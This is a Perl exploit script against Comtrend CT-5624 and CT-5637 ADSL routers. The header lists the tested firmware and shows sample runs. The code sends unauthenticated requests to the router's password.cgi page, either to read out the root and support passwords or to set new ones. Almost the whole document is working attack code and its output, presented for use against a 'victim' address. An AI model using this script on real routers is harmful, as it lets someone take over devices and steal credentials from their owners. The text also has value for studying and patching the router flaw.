Comtrend CT-5624 remote u:p change/disclosure exploit

1. #!/usr/bin/perl
2. #
3. #  [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit
4. #
5. #  Author: Todor Donev
6. #  Email: todor.donev@@gmail
7. #  Type: Hardware
8. #  Vuln Type: Remote
9. #
10. #  Tested:
11. #  Board ID    : CT-5624
12. #  Software    : A011-306TSR-C01_R03
13. #  Bootloader  : 1.0.37-0.7-3
14. #  ADSL        : A2pB022c3.d20e
15. #
16. #  Board ID    : CT-5637
17. #  Software    : A111-312BTC-C01_R12
18. #  Bootloader  : 1.0.37-12.1-1
19. #  ADSL        : A2pB023k.d20k_rc2
20. #
21. #####
22. #  CT-5624 ADSL2+ Ethernet Router
23. #  The CT-5624 series ADSL2+ compact and high performance Ethernet router
24. #  provides four 10/100 Ethernet Interfaces, and one ADSL line interface
25. #  to access the Internet, incorporating LAN or Video on Demand over one
26. #  ordinary telephone line, at speeds of up to 24 Mbps. It also has full
27. #  routing capabilities to segment/route IP protocol, and supports advanced
28. #  security functions.
29. #####
30. #
31. #  playground$ perl comtrend.pl -c 192.168.1.1:80
32. #  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
33. #  [!] Target: 192.168.1.1:80
34. #  [o] New root password: root31337
35. #  [o] New support password: sup31337
36. #  [*] Successfully !!
37. ##
38. #  playground$ perl comtrend.pl -d 192.168.1.1:80
39. #  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
40. #  [!] Target: 192.168.1.1:80
41. #  [o] root: root31337
42. #  [o] support: sup31337
43. ##
44. #  playground$ perl comtrend.pl
45. #  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
46. #  [!] usg: perl comtrend.pl [-c or -d] <victim>
47. #  [!]  -d: Disclosure Root/Support password
48. #  [!]  -c: Change Root/Support password
49. #
50. #####
51. #  Thanks to Tsvetelina Emirska
52. #  for the help and support which gives me =)
53. #####
54. #
55. #  http://www.ethical-hacker.org/
56. #  https://www.facebook.com/ethicalhackerorg
57.  
58. use LWP::Simple;
59. print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";
60. if (@ARGV == 0) {&usg;}
61. while (@ARGV > 0) {
62. $type = shift(@ARGV);
63. $t = shift(@ARGV);
64. if ($type eq "-d") {
65. my $r = get("http://$t/password.cgi") or die("suck!");
66. print "[!] Target: $t\n";
67. if ($r =~ m/pwdAdmin = '(.*)';/g) {
68. $result .= "[o] root: $1\n";
69. }    
70. if ($r =~ m/pwdSupport = '(.*)';/g) {
71. $result .= "[o] support: $1\n";
72. print $result;
73. }}}
74. if ($type eq "-c") {
75. print "[!] Target: $t\n";
76. print "[o] New root password: ";
77. my $rootpass=<STDIN>;
78. chomp($rootpass);
79. print "[o] New support password: ";
80. my $suppass=<STDIN>;
81. chomp($suppass);
82. my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");
83. if ($r =~ m/pwdAdmin = '$rootpass';/g) {
84. print "[*] Successfully !!\n";
85. }}
86. sub usg(){
87. print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n";
88. print "[!]  -d: Disclosure Root/Support password\n";
89. print "[!]  -c: Change Root/Support password\n";
90. exit;
91. }